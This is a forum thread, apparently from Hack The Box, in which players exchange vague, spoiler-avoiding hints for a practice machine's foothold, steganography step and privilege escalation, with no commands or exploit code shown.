@rafff said:
Hey guys, I may need some help. After the main page, I saw the i** port open, even connected to it (I never really used this kind of chat). Searched for exploit related and found. But when I try to use it on our well know msf, it doesn't open me a session ... Am I on the right track ? Or I should look elsewhere ? (of course I double checked the options I set)
Are you sure it doesnt open a session? Some MSF exploits produce access in less obvious ways so dont always expect a big notification saying session created.
If you get a "exploit completed but unable to create a session" message then double check your choice of exploit, your options and the RPORT you are targeting to reduce the chance it is just user error.
The initial foothold on this box is definitely possible with msf.
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Double check that is true. The choice of payload changes what your MSF session will tell you. For example, if your payload isn't meterpreter, dont expect a meterpreter session.
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
I wanted to do it without msf, it was a custom payload and not a single thing worked nomatter what i made it do. I found for those that have had issues with non msf exploitation (it seems like most have) it has to do with specific timing of when you send the payload which isnt actually clear at all when you look in to what msf is actually doing and the CVEs dont mention it either.
Just a note for those who want to do it the old fashioned way.
I got my shell manually, with just nc and a python rev shell. The exploit was very straight forward. Doing it manually meant I could monitor what the system responses were.
@Gogonnash said:
i'm going crazy about the steg part. i read all the hints in this thread but still no clue
are both lines important?
yes - what does one of those words relate to ? - its hidden in plain site.
i know what each of these words mean, but cant i cant find a use in this context. can i pm you? i want to know if my thoughts are going in the right direction
Got root... user is quite simple, however the machine is unstable and there are many resets, therefore the exploit often it does not work... you have to try several times.
Root is very simple if you find right thing.
Honestly - everything you need for foothold, user and root is in this thread
Foothold - enumerate properly - check all ports , then use google
User - again enumerate properly. Specifically for things you cant see straight away. When you find something interesting all the information you need is there - its staring you right in the face
Root - Enumerate again, look for files that can be exploited then look again for something you may not find in a standard Linux installation
One of the ironic things about this box on the Free servers is that the constant resets make it hard to get user.txt but, because lots of people are lazy in how they own the box, if it isn't reset, it can be really hard to see the easiest path to root.
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
@TazWake said:
One of the ironic things about this box on the Free servers is that the constant resets make it hard to get user.txt but, because lots of people are lazy in how they own the box, if it isn't reset, it can be really hard to see the easiest path to root.
User was really fun to get. Pretty straightforward too.
I'm stuck on Root however. I've run many enum tools but I can't find any nudge as to where to look. Maybe I'm burnout, but could anyone send me in the right direction?
I found the b file, I understood it and know from where it comes from but still stuck... Any hints?
Edit: i tried using the things name as password, things like that and nothing
@vitorfhc said:
I found the b file, I understood it and know from where it comes from but still stuck... Any hints?
Edit: i tried using the things name as password, things like that and nothing
@vitorfhc said:
I found the b file, I understood it and know from where it comes from but still stuck... Any hints?
Edit: i tried using the things name as password, things like that and nothing
I'm in the exact same situation at the moment. Got the file and seem to get the general idea of it but i'm still overlooking something(probably something trival as well). Can someone pm me for a nudge in the right direction?
Edit: Thank you all for the amazing help! I managed to find user. As most i was making it way too complicated in my head and overlooked things that i shouldn't have. Good learning experience tho.
The b* file refers to another methodology that is used to obfuscate data from a very specific file type. Look at the sections under 'Challenges' on HTB and compare the text above the password
OSCP
If at first you don't succeed, google the error message
Working on the priv esc. Pretty sure I'm right there, I've found the interesting part, just cannot figure out how to use this. Assuming its something simple.
Shell, User and Rooted. Really enjoyed this box taught me to look back sometimes and not only forward. Alongside making sure not to overthink too much.
@ZaphodBB said:
Honestly - everything you need for foothold, user and root is in this thread
Foothold - enumerate properly - check all ports , then use google
User - again enumerate properly. Specifically for things you cant see straight away. When you find something interesting all the information you need is there - its staring you right in the face
Root - Enumerate again, look for files that can be exploited then look again for something you may not find in a standard Linux installation
Couldn't agree more. Root is just about paying attention
Owned the machine.
User was straightforward. It was fun to do it, but not much of a challenge.
Root was really tricky. It's a really small detail that I believe many and many people will overlook. The technique itself is basic.
can anyone tell me where to or maybe how to look for root ......... tried all the basic priv escalation technique can't figure out where is that tiny detail !!!!
I used an Enumeration script and went through everything it listed , then I went on to a bunch of similar articles that led me to a " one liner " that suggested a few options , something stuck out , poked and prodded at it , it worked ...
Comments
Are you sure it doesnt open a session? Some MSF exploits produce access in less obvious ways so dont always expect a big notification saying session created.
If you get a "exploit completed but unable to create a session" message then double check your choice of exploit, your options and the RPORT you are targeting to reduce the chance it is just user error.
The initial foothold on this box is definitely possible with msf.
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Double check that is true. The choice of payload changes what your MSF session will tell you. For example, if your payload isn't meterpreter, dont expect a meterpreter session.
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
I wanted to do it without msf, it was a custom payload and not a single thing worked nomatter what i made it do. I found for those that have had issues with non msf exploitation (it seems like most have) it has to do with specific timing of when you send the payload which isnt actually clear at all when you look in to what msf is actually doing and the CVEs dont mention it either.
Just a note for those who want to do it the old fashioned way.
i'm going crazy about the steg part. i read all the hints in this thread but still no clue
are both lines important?
I got my shell manually, with just nc and a python rev shell. The exploit was very straight forward. Doing it manually meant I could monitor what the system responses were.
yes - what does one of those words relate to ? - its hidden in plain site.
i know what each of these words mean, but cant i cant find a use in this context. can i pm you? i want to know if my thoughts are going in the right direction
Got root... user is quite simple, however the machine is unstable and there are many resets, therefore the exploit often it does not work... you have to try several times.
Root is very simple if you find right thing.
still i am looking for priv esc....any hints plz?
Edit: Finally Rooted....
Finally root
Honestly - everything you need for foothold, user and root is in this thread
Foothold - enumerate properly - check all ports , then use google
User - again enumerate properly. Specifically for things you cant see straight away. When you find something interesting all the information you need is there - its staring you right in the face
Root - Enumerate again, look for files that can be exploited then look again for something you may not find in a standard Linux installation
Rooted ... good box.
There are plenty of good hints in here. Everything you need is in this thread.
One of the ironic things about this box on the Free servers is that the constant resets make it hard to get user.txt but, because lots of people are lazy in how they own the box, if it isn't reset, it can be really hard to see the easiest path to root.
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
I agree ... that's what happened to me :-))
User was really fun to get. Pretty straightforward too.
I'm stuck on Root however. I've run many enum tools but I can't find any nudge as to where to look. Maybe I'm burnout, but could anyone send me in the right direction?
Thanks
I found the b file, I understood it and know from where it comes from but still stuck... Any hints?
Edit: i tried using the things name as password, things like that and nothing
pm me what you have and Ill see if I can help
can someone PM me for help? Stuck at low priv. shell..
EDIT: Got user
I'm in the exact same situation at the moment. Got the file and seem to get the general idea of it but i'm still overlooking something(probably something trival as well). Can someone pm me for a nudge in the right direction?
Edit: Thank you all for the amazing help! I managed to find user. As most i was making it way too complicated in my head and overlooked things that i shouldn't have. Good learning experience tho.
The b* file refers to another methodology that is used to obfuscate data from a very specific file type. Look at the sections under 'Challenges' on HTB and compare the text above the password
OSCP
If at first you don't succeed, google the error message
Working on the priv esc. Pretty sure I'm right there, I've found the interesting part, just cannot figure out how to use this. Assuming its something simple.
EDIT: pwnd / derp.
Shell, User and Rooted. Really enjoyed this box taught me to look back sometimes and not only forward. Alongside making sure not to overthink too much.
Pm for hints
got user.... root is preety tricky for me... nudge
Couldn't agree more. Root is just about paying attention
Owned the machine.
User was straightforward. It was fun to do it, but not much of a challenge.
Root was really tricky. It's a really small detail that I believe many and many people will overlook. The technique itself is basic.
Can someone PM me for help? Stuck on the b file.
EDIT: Got it! Thanks to @ZaphodBB & @Sigilli
can anyone tell me where to or maybe how to look for root ......... tried all the basic priv escalation technique can't figure out where is that tiny detail !!!!
Can I have a hint on root? I am pretty new to this. Also I don't want spoilers, just hints, I tried a lot of priv esc techniques from https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ but maybe I let something pass...
I used an Enumeration script and went through everything it listed , then I went on to a bunch of similar articles that led me to a " one liner " that suggested a few options , something stuck out , poked and prodded at it , it worked ...